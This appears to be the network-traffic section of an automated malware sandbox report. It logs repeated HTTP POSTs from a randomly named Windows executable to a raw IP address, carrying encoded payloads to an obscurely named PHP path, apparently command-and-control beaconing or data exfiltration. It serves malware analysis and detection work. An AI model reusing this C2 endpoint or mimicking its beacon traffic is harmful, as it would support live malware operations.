                                                                                  Data Raw: 39 38 0d 0a 0e 1e 3a 0f 20 3b 2a 0c 3f 03 33 5a 29 11 36 1d 2b 2e 3e 58 2f 0c 37 5e 21 2c 2d 07 3e 3e 37 5e 30 00 20 00 23 2a 32 03 35 3c 20 07 3d 21 2e 58 01 1e 22 1a 23 20 35 52 24 59 37 57 3e 09 29 07 3f 07 26 5a 27 3c 28 0a 25 39 27 06 3f 03 27 0c 26 2e 26 5a 3b 11 01 5a 28 00 20 50 27 26 2b 51 03 1e 26 5b 26 02 2b 1c 26 0a 35 13 31 00 2a 00 34 58 2f 54 2a 38 01 56 20 3b 0c 16 2c 2a 3f 04 3c 3d 3a 10 2a 06 2e 5e 24 12 28 0d 32 04 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 98: ;*?3Z)6+.>X/7^!,->>7^0 #*25< =!.X"# 5R$Y7W>)?&Z'<(%9'?'&.&Z;Z( P'&+Q&[&+&51*4X/T*8V ;,*?<=:*.^$(2#T-,H1]V0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  40192.168.2.54990089.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:03:26.225400925 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:03:26.577965021 CET2536OUTData Raw: 58 53 43 57 5d 5d 57 56 55 5e 55 5a 54 53 50 57 57 52 5c 5b 52 57 51 58 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: XSCW]]WVU^UZTSPWWR\[RWQXZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#:81!)\-,_%/$U:P#"'"&T<8?7)5!_.#Q,
                                                                                  Dec 21, 2024 10:03:27.602607965 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:03:27.837593079 CET200INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:03:27 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 4<V@[0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  41192.168.2.54990689.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:03:28.087495089 CET380OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Dec 21, 2024 10:03:28.437304974 CET2536OUTData Raw: 58 54 46 57 5d 5b 57 51 55 5e 55 5a 54 5e 50 50 57 5c 5c 5a 52 52 51 5d 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: XTFW][WQU^UZT^PPW\\ZRRQ]ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ :(S&.=Q=!\.Y,$0S-;9 Y52""U+4_? _>%!_.#Q,2
                                                                                  Dec 21, 2024 10:03:29.468010902 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:03:29.700345039 CET200INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:03:29 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 4<V@[0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  42192.168.2.54991289.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:03:29.950001001 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:03:30.296660900 CET2536OUTData Raw: 58 57 43 50 58 5c 57 53 55 5e 55 5a 54 5d 50 5c 57 5a 5c 59 52 54 51 5f 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: XWCPX\WSU^UZT]P\WZ\YRTQ_ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ :(W$=.?!![-\0,,U,(!",!\1+$ <><Z)!_.#Q,>
                                                                                  Dec 21, 2024 10:03:31.326145887 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:03:31.560184956 CET200INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:03:31 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 4<V@[0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  43192.168.2.54991889.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:03:31.806632042 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:03:32.200653076 CET2536OUTData Raw: 58 5f 43 5e 58 5d 57 52 55 5e 55 5a 54 5f 50 54 57 53 5c 5a 52 5f 51 56 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: X_C^X]WRU^UZT_PTWS\ZR_QVZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#:/&=U*![9,3$?-(*"/=%T5(4Z?<)5!_.#Q,6


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  44192.168.2.54991989.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:03:32.808115959 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2112
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:03:33.156048059 CET2112OUTData Raw: 58 54 43 51 58 5b 57 53 55 5e 55 5a 54 5c 50 55 57 52 5c 5c 52 52 51 56 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: XTCQX[WSU^UZT\PUWR\\RRQVZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#-<&!=W5Z-+%?R9+%#=X%5<<((=!_.#Q,
                                                                                  Dec 21, 2024 10:03:34.186583996 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:03:34.420625925 CET349INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:03:33 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 39 38 0d 0a 0e 1e 3a 0c 37 15 29 57 3f 3a 02 00 2a 59 31 08 3e 2e 04 1b 2c 0b 37 5d 22 05 3e 10 2a 5b 34 00 30 00 34 02 22 29 36 04 35 06 28 06 3e 0b 2e 58 01 1e 21 0b 37 1d 2d 1e 33 11 02 0d 2a 24 2e 5d 2b 00 26 13 24 2f 09 19 26 3a 34 1b 3f 03 3b 0e 31 13 0c 12 38 01 2f 5e 3c 07 2c 55 24 1c 2b 51 03 1e 26 10 26 3c 05 57 26 20 29 12 25 2e 0f 5d 23 3d 34 0e 2a 06 01 51 20 3b 3a 5f 38 2a 3f 06 3c 03 2a 59 29 06 00 13 24 02 2c 08 32 3e 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 98:7)W?:*Y1>.,7]">*[404")65(>.X!7-3*$.]+&$/&:4?;18/^<,U$+Q&&<W& )%.]#=4*Q ;:_8*?<*Y)$,2>#T-,H1]V0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  45192.168.2.54992089.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:03:32.928050041 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:03:33.281277895 CET2536OUTData Raw: 5d 54 46 54 5d 57 57 50 55 5e 55 5a 54 52 50 52 57 5c 5c 58 52 54 51 58 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: ]TFT]WWPU^UZTRPRW\\XRTQXZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ C-"8T&%T=W&-Y?0,,.(-Q <&%?$$<>!_.#Q,
                                                                                  Dec 21, 2024 10:03:34.305059910 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:03:34.540568113 CET200INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:03:34 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 4<V@[0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  46192.168.2.54992689.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:03:34.796835899 CET380OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Dec 21, 2024 10:03:35.156455040 CET2536OUTData Raw: 58 53 46 53 58 5b 52 55 55 5e 55 5a 54 59 50 57 57 5e 5c 5d 52 51 51 5a 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: XSFSX[RUU^UZTYPWW^\]RQQZZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ 9%>%W*5]-?(]0?(T-(&#"%*P?7 ?.'>5!_.#Q,.
                                                                                  Dec 21, 2024 10:03:36.163799047 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:03:36.396311045 CET200INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:03:36 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 4<V@[0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  47192.168.2.54993289.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:03:36.638793945 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:03:36.987864017 CET2536OUTData Raw: 58 51 43 53 5d 5c 52 57 55 5e 55 5a 54 5f 50 53 57 58 5c 55 52 51 51 5e 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: XQCS]\RWU^UZT_PSWX\URQQ^ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#9" 2=":9?+0, T->7<!&1!(4$+4_)!_.#Q,6
                                                                                  Dec 21, 2024 10:03:38.014162064 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:03:38.248359919 CET200INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:03:37 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 4<V@[0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  48192.168.2.54993889.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:03:38.496766090 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:03:38.843765974 CET2536OUTData Raw: 5d 56 43 53 58 5d 57 5e 55 5e 55 5a 54 5a 50 56 57 52 5c 5d 52 5f 51 59 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: ]VCSX]W^U^UZTZPVWR\]R_QYZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ C.1,V&5Q=1-9??$Y<.45X%)+]+#=!_.#Q,"


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  49192.168.2.54993989.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:03:39.542537928 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2112
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:03:39.890510082 CET2112OUTData Raw: 58 52 46 53 5d 5b 57 54 55 5e 55 5a 54 53 50 54 57 52 5c 5b 52 52 51 56 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: XRFS][WTU^UZTSPTWR\[RRQVZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ C,2#%=>"-?<^'/(V:^)"<=&*48?')5!_.#Q,
                                                                                  Dec 21, 2024 10:03:40.919259071 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:03:41.156363964 CET349INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:03:40 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 39 38 0d 0a 0e 1e 39 55 21 3b 2d 54 28 14 2f 5f 2a 59 3a 50 29 3d 3a 59 2e 31 37 5f 36 3f 25 06 2a 04 23 58 27 10 2c 01 23 29 29 11 20 3c 2b 1d 2a 31 2e 58 01 1e 22 1b 20 20 3d 52 30 3f 3c 0e 3e 19 0c 5c 28 3d 39 01 24 2f 2b 14 31 2a 33 04 2b 03 38 1e 31 03 21 05 2c 01 23 12 2b 3e 30 57 26 26 2b 51 03 1e 26 5d 32 3c 3f 1f 32 0d 14 00 24 3e 3d 58 23 58 24 0e 3e 5e 33 53 20 15 3d 02 3b 00 24 16 28 04 3a 5d 2a 2b 21 00 30 3c 2f 54 25 3e 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 989U!;-T(/_*Y:P)=:Y.17_6?%*#X',#)) <+*1.X" =R0?<>\(=9$/+1*3+81!,#+>0W&&+Q&]2<?2$>=X#X$>^3S =;$(:]*+!0</T%>#T-,H1]V0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  50192.168.2.54994089.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:03:39.662297010 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:03:40.015459061 CET2536OUTData Raw: 58 52 46 54 5d 59 57 55 55 5e 55 5a 54 53 50 50 57 5f 5c 55 52 52 51 5f 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: XRFT]YWUU^UZTSPPW_\URRQ_ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ .8V2=*>9+3 :V /&2P*$>-Z=5!_.#Q,
                                                                                  Dec 21, 2024 10:03:41.040293932 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:03:41.272377968 CET200INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:03:40 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 4<V@[0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  51192.168.2.54994689.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:03:41.508147001 CET380OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2520
                                                                                  Expect: 100-continue
                                                                                  Dec 21, 2024 10:03:41.859224081 CET2520OUTData Raw: 58 52 46 50 5d 59 52 54 55 5e 55 5a 54 5b 50 55 57 5a 5c 5a 52 57 51 59 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: XRFP]YRTU^UZT[PUWZ\ZRWQYZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ @,13&[%*"%-?Y0/+-S7?>'".T<3]?[(=!_.#Q,>
                                                                                  Dec 21, 2024 10:03:42.885377884 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:03:43.120584011 CET200INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:03:42 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
